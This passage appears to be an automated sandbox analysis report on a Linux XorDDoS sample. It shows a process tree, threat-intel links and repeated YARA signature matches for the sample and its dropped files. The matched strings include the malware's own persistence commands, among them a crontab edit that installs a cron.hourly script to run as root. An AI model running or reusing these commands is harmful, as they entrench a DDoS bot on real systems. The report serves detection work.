zvrtnapfcs New Fork (PID: 6552, Parent: 6549)

dptxrnhxmx.elf New Fork (PID: 6550, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6551, Parent: 6550)

zvrtnapfcs (PID: 6551, Parent: 1860, MD5: 42da71a26ad9caa22fb437fcddc63a02) Arguments: /usr/bin/zvrtnapfcs ls 6209

zvrtnapfcs New Fork (PID: 6557, Parent: 6551)

dptxrnhxmx.elf New Fork (PID: 6553, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6554, Parent: 6553)

zvrtnapfcs (PID: 6554, Parent: 1860, MD5: 42da71a26ad9caa22fb437fcddc63a02) Arguments: /usr/bin/zvrtnapfcs "grep \"A\"" 6209

zvrtnapfcs New Fork (PID: 6559, Parent: 6554)

dptxrnhxmx.elf New Fork (PID: 6555, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6556, Parent: 6555)

zvrtnapfcs (PID: 6556, Parent: 1860, MD5: 42da71a26ad9caa22fb437fcddc63a02) Arguments: /usr/bin/zvrtnapfcs ls 6209

zvrtnapfcs New Fork (PID: 6561, Parent: 6556)

dptxrnhxmx.elf New Fork (PID: 6558, Parent: 6209)

dptxrnhxmx.elf New Fork (PID: 6560, Parent: 6558)

zvrtnapfcs (PID: 6560, Parent: 1860, MD5: 42da71a26ad9caa22fb437fcddc63a02) Arguments: /usr/bin/zvrtnapfcs "cat resolv.conf" 6209

zvrtnapfcs New Fork (PID: 6562, Parent: 6560)

systemd New Fork (PID: 6221, Parent: 6220)

snapd-env-generator (PID: 6221, Parent: 6220, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XOR DDoS, XORDDOS	Linux DDoS C&C Malware	No Attribution	http://blog.malwaremustdie.org/2014/09/mmd-0028-2014-fuzzy-reversing-new-china.html https://bartblaze.blogspot.com/2015/09/notes-on-linuxxorddos.html https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/ https://blog.checkpoint.com/wp-content/uploads/2015/10/sb-report-threat-intelligence-groundhog.pdf https://blog.nsfocusglobal.com/threats/vulnerability-analysis/analysis-report-of-the-xorddos-malware-family/	https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
dptxrnhxmx.elf	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
dptxrnhxmx.elf	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
dptxrnhxmx.elf	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
dptxrnhxmx.elf	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
dptxrnhxmx.elf	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
dptxrnhxmx.elf	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
dptxrnhxmx.elf	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
dptxrnhxmx.elf	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Click to see the 3 entries

Dropped Files

Source	Rule	Description	Author	Strings
/usr/bin/qabtuykfdb	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/qabtuykfdb	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/qabtuykfdb	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/qabtuykfdb	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/qabtuykfdb	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/qabtuykfdb	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/qabtuykfdb	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/qabtuykfdb	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/tqdlzqtrvv	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/tqdlzqtrvv	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/tqdlzqtrvv	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/tqdlzqtrvv	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/tqdlzqtrvv	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/tqdlzqtrvv	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/tqdlzqtrvv	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/lib/libudev.so	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/lib/libudev.so	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/lib/libudev.so	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/lib/libudev.so	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/lib/libudev.so	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/lib/libudev.so	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/lib/libudev.so	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/lib/libudev.so	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/rhlqbltizb	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/rhlqbltizb	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/rhlqbltizb	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/rhlqbltizb	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/rhlqbltizb	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/rhlqbltizb	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/rhlqbltizb	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/rhlqbltizb	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/wrvptdarnp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/wrvptdarnp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/wrvptdarnp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/wrvptdarnp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/wrvptdarnp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/wrvptdarnp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/wrvptdarnp	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/wrvptdarnp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/mntlutgnfs	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/mntlutgnfs	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/mntlutgnfs	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/mntlutgnfs	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/mntlutgnfs	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/mntlutgnfs	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/mntlutgnfs	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/mntlutgnfs	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/scllcnzpeu	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/scllcnzpeu	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/scllcnzpeu	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/scllcnzpeu	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/scllcnzpeu	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/scllcnzpeu	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/scllcnzpeu	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 0x6b204:$st0: BB2FA36AAA9541F0
/usr/bin/scllcnzpeu	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
/usr/bin/wobaryykiz	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/zfzhrlhjxr	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
/usr/bin/wobaryykiz	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/wobaryykiz	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/wobaryykiz	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/wobaryykiz	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/wobaryykiz	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/zfzhrlhjxr	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
/usr/bin/zfzhrlhjxr	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
/usr/bin/zfzhrlhjxr	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
/usr/bin/zfzhrlhjxr	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
/usr/bin/zfzhrlhjxr	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
/usr/bin/wobaryykiz	XOR_DDosv1	Rule to detect XOR DDos infection	Akamai CSIRT	0x6b0c4:$st0: BB2FA36AAA9541F0 0x6b0d4:$st0: BB2FA36AAA9541F0 0x6b0e4:$st0: BB2FA36AAA9541F0 0x6b0f4:$st0: BB2FA36AAA9541F0 0x6b104:$st0: BB2FA36AAA9541F0 0x6b114:$st0: BB2FA36AAA9541F0 0x6b124:$st0: BB2FA36AAA9541F0 0x6b134:$st0: BB2FA36AAA9541F0 0x6b144:$st0: BB2FA36AAA9541F0 0x6b154:$st0: BB2FA36AAA9541F0 0x6b164:$st0: BB2FA36AAA9541F0 0x6b174:$st0: BB2FA36AAA9541F0 0x6b184:$st0: BB2FA36AAA9541F0 0x6b194:$st0: BB2FA36AAA9541F0 0x6b1a4:$st0: BB2FA36AAA9541F0 0x6b1b4:$st0: BB2FA36AAA9541F0 0x6b1c4:$st0: BB2FA36AAA9541F0 0x6b1d4:$st0: BB2FA36AAA9541F0 0x6b1e4:$st0: BB2FA36AAA9541F0 0x6b1f4:$st0: BB2FA36AAA9541F0 